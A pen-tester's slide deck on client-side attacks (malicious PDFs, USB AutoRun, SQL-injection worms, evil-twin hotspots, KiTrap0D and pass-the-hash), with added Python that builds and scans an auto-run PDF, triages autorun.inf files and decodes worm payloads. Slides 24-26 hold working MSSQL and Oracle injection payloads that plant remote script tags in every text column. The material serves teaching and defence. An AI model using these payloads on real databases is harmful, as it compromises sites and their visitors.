Tactical Assassins

Client-side exploitation techniques: attack the client side, then move into the intranet, for fun. Also covers recent Microsoft vulnerabilities that went unpatched for as long as a year (MS sucks...).

Tactical Assassins

  1. Tactical Assassins: Client-Side OWNage. Prathan Phongthiproek, Senior Information Security Consultant, ACIS Professional Center
  2. Who am I?! Instructor / Speaker; Red Team: Penetration Tester (Team Leader); Security Consultant / Researcher; CWH Underground; exploit and vulnerability disclosure on Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc.
  3. Let's Talk! Attack Layer 8: Client-Side OWNage (MS Office evil macro; malicious Adobe PDF; malicious USB; one-click attack; evil-twin attack). Built-in pen-test tactics (Black Hat versus White Hat; using Black Hat styles to compromise systems). Operation CloudBurst.
  4. Client-Side OWNage: The Way to Attack Layer 8!
  5. MS Office (Evil Macro)! MS Office is Evil!!
  6. MS Office (Evil Macro)!
  7. MS Office (Evil Macro)!
  8. MS Office (Evil Macro)!
  9. Malicious Adobe PDF!
  10. Malicious Adobe PDF!
  11. Malicious Adobe PDF!
  12. Malicious Adobe PDF!
  13. Malicious Adobe PDF! Malicious PDF File
  14. Malicious Adobe PDF!
  15. Malicious Adobe PDF!
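The PDF slides above are screenshots, so here is what the delivery mechanism looks like in bytes, as an added example that is not part of the deck: a one-page PDF whose catalog /OpenAction runs a JavaScript action as soon as the file opens, plus a small scanner that inflates FlateDecode streams so the script is still found when it is compressed. The PDF structure, the object numbering and the script (a harmless app.alert) are all constructed here; nothing is taken from the author's files.

```python
"""A PDF that runs JavaScript the moment it is opened, and a scanner that
catches it even when the script is hidden in a FlateDecode stream.

Added example for the 'Malicious Adobe PDF' slides (9-15); not the deck's own
files. The PDF bytes and the script (a harmless app.alert) are constructed
here: this shows the delivery mechanism the slides discuss, not an exploit.
"""
import re
import zlib

def _assemble(objs):
    """Serialise numbered objects with a correct xref table and trailer."""
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_at = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (
        len(objs) + 1, xref_at)
    return bytes(out)

def build_openaction_pdf(js, compress=False):
    """One-page PDF whose catalog /OpenAction is a /JavaScript action whose
    code sits in stream object 5. With compress=True the stream is
    Flate-encoded, so grepping the file for the script text finds nothing."""
    body = js.encode("latin-1")
    if compress:
        body = zlib.compress(body)
        head = b"<< /Length %d /Filter /FlateDecode >>" % len(body)
    else:
        head = b"<< /Length %d >>" % len(body)
    return _assemble([
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Type /Action /S /JavaScript /JS 5 0 R >>",
        head + b"\nstream\n" + body + b"\nendstream",
    ])

# Names worth a second look in any inbound PDF: triggers and payload carriers.
RISKY_NAMES = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch",
               b"/EmbeddedFile", b"/RichMedia"]
_STREAM_HDR = re.compile(rb"<<([^<>]*)>>\s*stream\r?\n")
_DIRECT_LENGTH = re.compile(rb"/Length\s+(\d+)(?!\s+\d+\s+R)")
_JS_API = re.compile(rb"\b(app|util|this|event)\.|eval\(|unescape\(")

def scan_pdf(data):
    """Count risky names, inflate each stream, and flag an auto-run script."""
    names = {}
    for name in RISKY_NAMES:                 # a name token ends at a delimiter
        hits = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", data))
        if hits:
            names[name.decode()] = hits
    streams = []
    for m in _STREAM_HDR.finditer(data):
        length = _DIRECT_LENGTH.search(m.group(1))
        if not length:                       # indirect /Length: not handled here
            continue
        raw = data[m.end():m.end() + int(length.group(1))]
        entry = {"filter": None, "inflated": True, "js": False, "text": ""}
        if b"/FlateDecode" in m.group(1):
            entry["filter"] = "FlateDecode"
            try:
                raw = zlib.decompress(raw)
            except zlib.error:               # corrupt or deliberately broken
                entry["inflated"] = False
                streams.append(entry)
                continue
        entry["text"] = raw.decode("latin-1")
        entry["js"] = bool(_JS_API.search(raw))
        streams.append(entry)
    auto_run = "/OpenAction" in names or "/AA" in names
    has_js = ("/JavaScript" in names or "/JS" in names
              or any(s["js"] for s in streams))
    return {"names": names, "streams": streams, "suspicious": auto_run and has_js}

if __name__ == "__main__":
    script = "app.alert('constructed sample: this ran when the file opened');"
    for packed in (False, True):
        pdf = build_openaction_pdf(script, compress=packed)
        print("compressed" if packed else "plain", "| grep sees script:",
              script.encode() in pdf, "| scan:", scan_pdf(pdf)["suspicious"])
```

Running it prints that a plain grep finds the script only in the uncompressed file, while the scanner flags both, because it pairs the /OpenAction trigger with the /JavaScript action and inflates the stream the action points to. Real malicious PDFs go further (object streams, other filters, indirect /Length), which is why the scanner reports what it could not inflate instead of silently passing it.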
  16. Malicious USB! Autoplay, NOT Autorun
  17. Malicious USB! Turning off Autoplay still leaves you vulnerable to an evil USB: Autoplay is only the prompt, AutoRun is the autorun.inf processing behind it
  18. Malicious USB!
  19. Malicious USB!
  20. Malicious USB! Set the NoDriveTypeAutoRun value to 0xff under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer to disable AutoRun for every drive type
  21. Malicious USB!
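To make slides 17 and 20 concrete, here is an added example (not from the deck) that triages an autorun.inf and interprets the NoDriveTypeAutoRun mask. The autorun.inf text is constructed, with made-up file names; it uses the usual tricks of hijacking the drive's open/explore verbs and borrowing a SHELL32.dll icon so the stick looks like a folder. The bit layout of the mask follows GetDriveType() drive-type numbering.

```python
"""Triage an autorun.inf and check which NoDriveTypeAutoRun mask stops it.

Added example for the 'Malicious USB' slides (16-21); not the deck's own
material. The autorun.inf below is constructed: it shows the usual tricks of
hijacking the drive's double-click and context-menu verbs and borrowing a
system icon so the drive looks like an ordinary folder. File names are made up.
"""
import re

# A set bit disables AutoRun for that drive type (bit = 1 << GetDriveType()
# value, 0x80 for drives of unknown type), so 0xFF (slide 20) covers all.
DRIVE_BITS = {"unknown": 0x01, "no_root_dir": 0x02, "removable": 0x04,
              "fixed": 0x08, "remote": 0x10, "cdrom": 0x20, "ramdisk": 0x40,
              "unknown_type": 0x80}
REG_KEY = (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
           r"\Policies\Explorer")
REG_VALUE = "NoDriveTypeAutoRun"

def autorun_blocked(mask, drive_type):
    """True if NoDriveTypeAutoRun=mask disables AutoRun for drive_type."""
    return bool(mask & DRIVE_BITS[drive_type])

def parse_autorun_inf(text):
    """Minimal INI parser: {section: {key: value}}, names lower-cased so
    [AutoRun]/[autorun] and Open=/open= compare equal."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections

_EXEC_EXT = re.compile(r"\.(exe|scr|com|bat|cmd|pif|vbs|js|hta)\b", re.I)

def triage_autorun(text):
    """What the file would run, which verbs it hijacks, how the drive is dressed up."""
    auto = parse_autorun_inf(text).get("autorun", {})
    commands = {}
    for key, value in auto.items():
        if key in ("open", "shellexecute"):
            commands[key] = value            # classic AutoRun launch
        elif key.startswith("shell\\") and key.endswith("\\command"):
            commands[key] = value            # runs on double-click / context menu
    return {
        "commands": commands,
        "default_verb": auto.get("shell"),
        "icon_from_shell32": "shell32.dll" in auto.get("icon", "").lower(),
        "launches_executable": any(_EXEC_EXT.search(v) for v in commands.values()),
    }

SAMPLE_AUTORUN_INF = """; constructed sample, not a real capture
[AutoRun]
open=.hidden\\payload.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
label=Photos
shell\\open=&Open
shell\\open\\command=.hidden\\payload.exe
shell\\explore\\command=.hidden\\payload.exe
shell=open
"""

if __name__ == "__main__":
    print(triage_autorun(SAMPLE_AUTORUN_INF))
    for mask in (0x91, 0xFF):
        blocked = [t for t in DRIVE_BITS if autorun_blocked(mask, t)]
        print(f"{REG_VALUE}={mask:#x} blocks AutoRun on: {blocked}")
```

The triage output shows the point of slide 17: besides the open= line that AutoRun would launch, the shell\open\command and shell\explore\command entries hijack what Explorer does when the user opens the drive by hand, so dismissing the Autoplay prompt does not help. A mask such as 0x91 leaves removable drives enabled; 0xFF, the value on slide 20, disables AutoRun for every drive type.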
  22. One-Click Attack!
  23. One-Click Attack!
  24. One-Click Attack! SQL Injection Worms - MSSQL! The injection as it arrives in a URL parameter: ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x... AS%20NVARCHAR(4000));EXEC(@S);-- (the hex blob is omitted here; it is the UTF-16LE encoding of the statement on the next slide)
  25. One-Click Attack! SQL Injection Worms - MSSQL! The same injection with the blob decoded. CAST(0x... AS NVARCHAR(4000)) turns it back into this T-SQL, which walks every text/ntext/varchar/nvarchar column (xtype 35/99/167/231) of every user table and appends a script tag: DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.fengnima.cn/k.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
  26. One-Click Attack! SQL Injection Worms - Oracle! http://127.0.0.1:81/ora4.php?name=1 and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin execute immediate '''''''' alter session set current_schema=SCOTT ''''''''; execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||chr(97)||chr(116)||chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||C.column_name||chr(61)||C.column_name||chr(124)||chr(124)||chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||chr(115)||chr(114)||chr(99)||chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)||chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||chr(46)||chr(99)||chr(111)||chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME = C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr(82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE rec.foo;end loop;execute immediate ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)-- (Decoded, the chr() chains spell out: update <TABLE> set <COL>=<COL>||'<script src="http://www.notsosecure.com/test.js"></script>' for every VARCHAR column wider than 200 in tablespace USERS, executed inside an autonomous transaction through DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES.)
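Slides 24-26 show the two obfuscations these worms rely on: MSSQL hides the statement as a UTF-16LE hex blob inside CAST(0x... AS NVARCHAR(4000)), Oracle spells the string out as chr()||chr()||... chains. The following is an added example, not code from the deck, that decodes both forms and pulls out the script URL each payload would stamp into the database, plus the REPLACE-based cleanup statement an incident responder ends up writing. The MSSQL sample is rebuilt from the decoded T-SQL on slide 25 (the original hex blob is not reproduced) and the Oracle sample is the inner SELECT from slide 26; both are constructed test strings, not captured traffic.

```python
"""Decode the two payload encodings used by the SQL-injection worms on slides
24-26 and recover the <script src=...> tag they stamp into every text column.

Added example, not code from the deck. The MSSQL sample is rebuilt from the
decoded T-SQL on slide 25 (the original 0x... blob is not reproduced); the
Oracle sample is the chr()-obfuscated inner SELECT from slide 26. Both are
constructed test strings, not captured traffic.
"""
import re
from urllib.parse import unquote

# --- MSSQL: CAST(0x... AS NVARCHAR(4000)) hides the statement as UTF-16LE hex

def encode_mssql_blob(tsql):
    """Build the hex literal the way the worm does: UTF-16LE bytes of the T-SQL."""
    return "0x" + tsql.encode("utf-16-le").hex().upper()

_CAST = re.compile(r"CAST\s*\(\s*0[xX]([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.I)

def decode_mssql_casts(payload):
    """Decoded text of every CAST(0x... AS [N]VARCHAR) in a (URL-encoded)
    injection string. NVARCHAR means UTF-16LE; plain VARCHAR is single-byte."""
    found = []
    for m in _CAST.finditer(unquote(payload)):
        hexdigits, nprefix = m.group(1), m.group(2)
        if len(hexdigits) % 2:                 # truncated blob: report nothing
            continue
        enc = "utf-16-le" if nprefix.upper() == "N" else "latin-1"
        found.append(bytes.fromhex(hexdigits).decode(enc, errors="replace"))
    return found

# --- Oracle: chr(n)||chr(n)||... spells out a string literal one byte at a time

_CHR_RUN = re.compile(r"chr\s*\(\s*\d+\s*\)(?:\s*\|\|\s*chr\s*\(\s*\d+\s*\))*", re.I)

def decode_oracle_chr(payload):
    """Replace each run of chr()||chr() with the quoted literal it builds."""
    def to_literal(m):
        text = "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0)))
        return "'" + text.replace("'", "''") + "'"
    return _CHR_RUN.sub(to_literal, unquote(payload))

# --- What both worms are really doing: injecting a remote script into data

_SCRIPT_SRC = re.compile(r"<script\s+src=[\"']?([^\"'\s>]+)", re.I)

def injected_script_urls(payload):
    """Decode with both schemes and list the script URLs the payload injects."""
    urls = []
    for text in decode_mssql_casts(payload) + [decode_oracle_chr(payload)]:
        for url in _SCRIPT_SRC.findall(text):
            if url not in urls:
                urls.append(url)
    return urls

def remediation_sql(table, column, tag):
    """T-SQL that strips one injected tag from one column. Quotes and brackets
    are doubled so the tag text itself cannot re-inject."""
    t, c = table.replace("]", "]]"), column.replace("]", "]]")
    safe = tag.replace("'", "''")
    return f"UPDATE [{t}] SET [{c}]=REPLACE(CONVERT(varchar(max),[{c}]),'{safe}','')"

# Decoded statement from slide 25: cursor over every text(35)/ntext(99)/
# varchar(167)/nvarchar(231) column of every user table, appending the tag.
MSSQL_TSQL = (
    "DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and "
    "a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']="
    "rtrim(convert(varchar,['+@C+']))+''<script src=http://www.fengnima.cn/k.js"
    "></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor")
MSSQL_PAYLOAD = ("';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST("
                 + encode_mssql_blob(MSSQL_TSQL)
                 + "%20AS%20NVARCHAR(4000));EXEC(@S);--")

# Inner SELECT from slide 26 (the PL/SQL and DBMS_EXPORT_EXTENSION wrapper
# around it contains no chr() chains and is left out of the sample).
ORACLE_PAYLOAD = (
    "for rec in (select chr(117)||chr(112)||chr(100)||chr(97)||chr(116)||chr(101)||chr(32)"
    "||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||C.column_name"
    "||chr(61)||C.column_name||chr(124)||chr(124)||chr(39)||chr(60)||chr(115)||chr(99)"
    "||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||chr(115)||chr(114)||chr(99)"
    "||chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)"
    "||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)||chr(111)||chr(116)"
    "||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)"
    "||chr(46)||chr(99)||chr(111)||chr(109)||chr(47)||chr(116)||chr(101)||chr(115)"
    "||chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)"
    "||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39)"
    " as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME = C.TABLE_NAME"
    " and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr(82)||chr(83)"
    " and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr(72)"
    "||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE"
    " rec.foo;end loop;")

if __name__ == "__main__":
    print(decode_mssql_casts(MSSQL_PAYLOAD)[0])
    print(decode_oracle_chr(ORACLE_PAYLOAD))
    for p in (MSSQL_PAYLOAD, ORACLE_PAYLOAD):
        print(injected_script_urls(p))
    print(remediation_sql("News", "Body", "<script src=http://www.fengnima.cn/k.js></script>"))
```

The decoder is the part that matters for detection: a WAF or log review that only looks for `<script` in the request never sees it, because the tag only exists after CAST or chr() has run inside the database. The cleanup statement is per column on purpose; the worm's own cursor is the map of which columns to run it over.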
  27. One-Click Attack!
  28. One-Click Attack!
  29. One-Click Attack!
  30. One-Click Attack!
  31. One-Click Attack! Link to malicious website -> reverse shell to the attacker
  32. One-Click Attack!
  33. Evil-Twin Attack! Karma + Metasploit = Karmetasploit!! Rogue access point (Evil Twin): steal usernames, passwords and information from public wireless hotspots. Why don't we steal something nastier, like credit cards (pay-to-play hotspots)??
  34. Evil-Twin Attack!
  35. Evil-Twin Attack!
  36. Evil-Twin Attack!
  37. Built-in Pen-Test Tactics!
  38. Black Hat versus White Hat! Black Hat: thinking outside of the box; knows one piece of information and has to expand from there; compromises all systems, then picks the target; all methodologies are integrated; downloads exploits from Milw0rm, does manual footprinting, no noisy scans, just Nmap and 0-day attacks; Attack Layer 8: Client-Side OWNage. White Hat: thinking inside the box; assigned a limited block of IP addresses; unable to go beyond the scope of the approved list ("only touch xyz hosts, don't touch abc host"); follows pen-test methodologies: OSSTMM, NIST, ISSAF; exploits with Core Impact, CANVAS, Metasploit; "Oops, I cannot hack the user."
  39. Using Black Hat styles to compromise systems: a pen-tester must "think outside of the box"; Attack Layer 8 gives more effective results; pen-test with Black Hat styles, using a Black Hat mind: email address enumeration; social networking (Maltego); social engineering (Adobe PDF, evil macro, one-click attack, IE Aurora, etc.); information gathering on all subdomains (xyz.victim.com, abc.victim.com, 123.victim.com); blind test, compromise all systems, then targeted attack
  40. Using Black Hat styles to compromise systems
  41. Operation CloudBurst!
  42. KiTrap0D: Local Ring0 Kernel Exploit. MS Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack. Affects every 32-bit release of the Windows NT kernel (Windows 2000, XP, Server 2003, Vista, Server 2008, 7). Not affected: Windows 7 (64-bit), Windows Server 2008 (64-bit, Itanium). Patch released as MS10-015 on Feb 9, 2010. Get the hell outta here!! 0-day for 1 month. W00t! W00t!
  43. KiTrap0D: Local Ring0 Kernel Exploit
  44. Token Kidnapping: Elevate Privilege. Tokens are like web cookies. On Windows XP / 2003, Windows services run as the SYSTEM account, so compromise of a service == full system compromise. On Windows Vista / 2008, LocalService / NetworkService can still get to SYSTEM. Affects every release of the Windows NT kernel (Windows 2000, XP, Server 2003, Vista, Server 2008, 7). Patch released as MS09-012 on April 14, 2009. 0-day for 1 year. W00t! W00t!! Black hat mind!! Combine Attack Layer 8 + KiTrap0D + Token Kidnapping.
  45. Operation CloudBurst. Start the mission with Attack Layer 8: spam mail / 1-click ownage, reverse shell to the attacker. KiTrap0D (the message from slave to god): 0-day ring0 exploit, all Windows OS. Maintain access: pivot (tunneling), backdoor position. Compromise all systems and the domain controller: impersonate token, pass-the-hash attack.
  46. Operation CloudBurst! Diagram: reverse shell connection from the intranet out to the attacker on the Internet; attack the network with pass-the-hash, the KiTrap0D exploit and token impersonation; pivot into the network with route add.
  47. If someone is still in the room.. Q&A! Thank you!
